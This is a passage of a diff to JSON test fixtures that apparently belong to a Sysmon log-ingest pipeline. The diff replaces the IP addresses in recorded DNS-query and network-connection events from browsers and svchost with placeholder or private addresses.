UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2794,7 +2794,7 @@ "version": 5, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;", + "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.343", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2822,7 +2822,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2851,7 +2851,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;", + "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.391", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2864,7 +2864,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2924,7 +2924,7 @@ "ProcessId": "2736", "QueryName": "ocsp.sectigo.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "level": "information", @@ -2946,7 +2946,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -3022,7 +3022,7 @@ "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "User": "NT AUTHORITY\\NETWORK SERVICE", "SourceIsIpv6": "true", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "domain", "DestinationIsIpv6": "true", "UtcTime": "2019-03-18 16:57:47.847", @@ -3031,7 +3031,7 @@ "SourcePort": "62141", "Image": "C:\\Windows\\System32\\svchost.exe", "Protocol": "udp", - "DestinationIp": "a00:203:3000:3000:3000:3000:3000:3300" + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "channel": "Microsoft-Windows-Sysmon/Operational", "opcode": "Info", @@ -3047,7 +3047,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3109,7 +3109,7 @@ "@timestamp": "2021-05-05T15:30:51.700Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, @@ -3137,7 +3137,7 @@ "ProcessId": "1600", "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "Initiated": "true", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "SourceHostname": "vagrant-2012-r2.local.crowbird.com" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -3162,7 +3162,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 